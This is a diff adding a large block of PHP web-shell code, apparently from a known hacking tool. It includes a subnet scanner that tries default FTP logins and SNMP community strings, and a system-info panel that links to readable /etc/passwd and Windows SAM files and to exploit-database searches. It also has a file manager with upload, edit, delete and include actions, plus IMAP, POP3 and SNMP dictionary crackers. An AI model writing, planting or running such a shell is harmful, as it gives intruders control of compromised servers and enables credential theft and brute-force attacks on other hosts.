+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+}
+}
+}
+if(!empty($_REQUEST['smtprelay'])){
+if(checkthisporT($ip,25,$timeout)){
+$res='';
+$res=checksmtP($ip,$timeout);
+if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
+}
+}
+if(!empty($_REQUEST['snmpscanner'])){
+if(checkthisporT($ip,161,$timeout,1)){
+$com=$_REQUEST['com'];
+$coms=$res="";
+if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
+foreach ($c as $v){
+$ret=snmpchecK($ip,$v,$timeout);
+if($ret)$coms .=" $v ";
+}
+if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
+flusheR();
+}
+}
+if(!empty($_REQUEST['ftpscanner'])){
+if(checkthisporT($ip,21,$timeout)){
+$usps=explode(',',$_REQUEST['userpass']);
+foreach ($usps as $v){
+$user=substr($v,0,strpos($v,':'));
+$pass=substr($v,strpos($v,':')+1);
+if($pass=='[BLANK]')$pass='';
+$ftp=@ftp_connect($ip,21,$timeout);
+if ($ftp){
+if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
+}
+flusheR();
+}
+}
+}
+if($output)echo "<hr size=1 noshade>";
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+if(!empty($buglist))unlink($buglist);
+}
+else{
+$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
+$host = substr($host,0,strrpos($host,"."));
+echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
+}
+}
+function sysinfO(){
+global $windows,$disablefunctions,$safemode;
+$cwd= getcwd();
+$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program=";
+$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
+if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
+$osver=$tsize=$fsize='';
+if ($windows){ 
+$osver = "  (".shelL("ver").")";
+$sysroot = shelL("echo %systemroot%");
+if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
+if (empty($sysroot)) $sysroot = getenv("windir");
+if (empty($sysroot)) $sysroot = "Not Found";
+if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
+for ($i=66;$i<=90;$i++){
+$drive= chr($i).':\\';
+if (is_dir($drive)){
+$fsize+=@disk_free_space($drive);
+$tsize+=@disk_total_space($drive);
+}
+}
+}else{
+$fsize=disk_free_space('/');
+$tsize=disk_total_space('/');
+}
+$disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
+if (empty($CPU)) $CPU = "Unknow";
+$os = php_unamE();
+$osn=php_unamE('s');
+if(!$windows){ 
+$ker = php_unamE('r');
+$o=($osn=="Linux")?"Linux+Kernel":$osn;
+$os = str_replace($osn,"${mil}$o\">$osn</a>",$os);
+$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os);
+$inpa=':';
+}else{
+$sam = $sysroot."\\system32\\config\\SAM";
+$inpa=';';
+$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os);
+}
+$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']);
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>";
+if ($windows){
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>";
+}
+else
+{
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">";
+if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
+if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found";
+echo "</td></tr>";
+}
+$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>";
+}
+function checksuM($file){
+global $et;
+echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et";
+}
+function listdiR($cwd,$task){
+$c= getcwd();
+$dh = opendir($cwd);
+while ($cont=readdir($dh)){
+if($cont=='.' || $cont=='..')continue;
+$adr = $cwd.DIRECTORY_SEPARATOR.$cont;
+switch ($task){
+case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
+case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
+case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
+case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
+}
+if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
+}
+}
+if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
+if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
+function filemanager(){
+global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
+$cwd= getcwd();
+$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">";
+$td1n="<td width=\"22%\" bgcolor=\"#666666\">";
+$td2m="<td width=\"22%\" bgcolor=\"#808080\">";
+$td1i="<td width=\"5%\" bgcolor=\"#666666\">";
+$td2i="<td width=\"5%\" bgcolor=\"#808080\">";
+$tdnr="<td width=\"22%\" bgcolor=\"#800000\">";
+$tdw="<td width=\"22%\" bgcolor=\"#006E00\">";
+if (!empty($_REQUEST['task'])){
+if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
+if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
+echo "<font color=blue><pre>";
+listdiR($cwd,$_REQUEST['task']);
+echo "</pre></font>";
+}else{
+if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
+if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
+$title="Destination";
+$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
+$dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
+}else{
+$ad = $_REQUEST['rN'];
+$title ="New name";
+$dis = "Rename";
+}
+if (!!empty($_REQUEST['deS'])){
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>";
+}else{
+if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
+else{
+copy($ad,$_REQUEST['deS']);
+if (!empty($_REQUEST['mV']))unlink($ad);
+}
+}
+}
+if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
+$dh = opendir($_REQUEST['deL']);
+$d="";
+while ($cont=readdir($dh)){$d++;}
+if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}}
+if (!empty($_FILES['uploadfile'])){
+move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
+echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
+}
+$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\"";
+if (!empty($_REQUEST['newf'])){
+if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");}
+if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
+}
+if ($windows){
+echo "$table<td><b>Drives:</b> ";
+for ($i=66;$i<=90;$i++){$drive= chr($i).':';
+if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
+}
+echo $et;
+}
+echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>";
+$file=array();$dir=array();$link=array();
+if($dirhandle = opendir($cwd)){
+while ($cont=readdir($dirhandle)){
+if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont;
+elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont;
+else $link[]=$cont;
+}
+closedir($dirhandle);
+sort($file);sort($dir);sort($link);
+echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>";
+$i=0;
+foreach($dir as $dn){
+echo "<tr>";
+$i++;
+$own="Unknow";
+$owner=posix_getpwuid(fileowner($dn));
+$mdate=date("Y/m/d H:i:s",filemtime($dn));
+$adate=date("Y/m/d H:i:s",fileatime($dn));
+$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>";
+if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">";
+if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>";
+echo "$cl1------</td>";
+echo $cl2.$diraction;
+echo "</tr>" ;
+flusheR();
+}
+foreach($file as $fn){
+echo "<tr>";
+$i++;
+$own = "Unknow";
+$owner = posix_getpwuid(fileowner($fn));
+$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>";
+$mdate = date("Y/m/d H:i:s",filemtime($fn));
+$adate = date("Y/m/d H:i:s",fileatime($fn));
+if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+$size = showsizE(filesize($fn));
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">";
+if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>";
+echo "$cl1$size</td>";
+echo $td2m.$fileaction;
+echo "</tr>" ;
+flusheR();
+}
+foreach($link as $ln){
+$own = "Unknow";
+$i++;
+$owner = posix_getpwuid(fileowner($ln));
+$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>";
+$mdate = date("Y/m/d H:i:s",filemtime($ln));
+$adate = date("Y/m/d H:i:s",fileatime($ln));
+if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+echo "<tr>";
+$size = showsizE(filesize($ln));
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">";
+if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>";
+echo "$cl1$size</td>";
+echo $cl2.$linkaction;
+echo "</tr>" ;
+flusheR();
+}
+}
+$dc = count($dir)-2;
+if($dc==-2)$dc=0;
+$fc = count($file);
+$lc = count($link);
+$total = $dc + $fc + $lc;
+echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et";
+}
+}
+function imaplogiN($host,$username,$password){
+$sock=fsockopen($host,143,$n,$s,5);
+$b=namE();
+$l=strlen($b);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,"$b LOGIN $username $password\r\n");
+$res=fgets($sock,$l+4);
+if ($res == "$b OK")return 1;else return 0;
+fclose($sock);
+}
+function pop3logiN($server,$user,$pass){
+$sock=fsockopen($server,110,$en,$es,5);
+if(!$sock)return -1;
+fread($sock,1024);
+fwrite($sock,"user $user\n");
+$r=fgets($sock);
+if($r{0}=='-')return 0;
+fwrite($sock,"pass $pass\n");
+$r=fgets($sock);
+fclose($sock);
+if($r{0}=='+')return 1;
+return 0;
+}
+function imapcrackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$imap=imaplogiN($target,$user,$pass);
+if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
+if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}IMAP cracker:$crack";
+}
+function snmpcrackeR(){
+global $t,$et,$errorbox,$crack,$hcwd;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+$com=trim(fgets($dictionary)," \n\r");
+$res=snmpchecK($target,$com,2);
+if($res)echo "$com<br>";
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
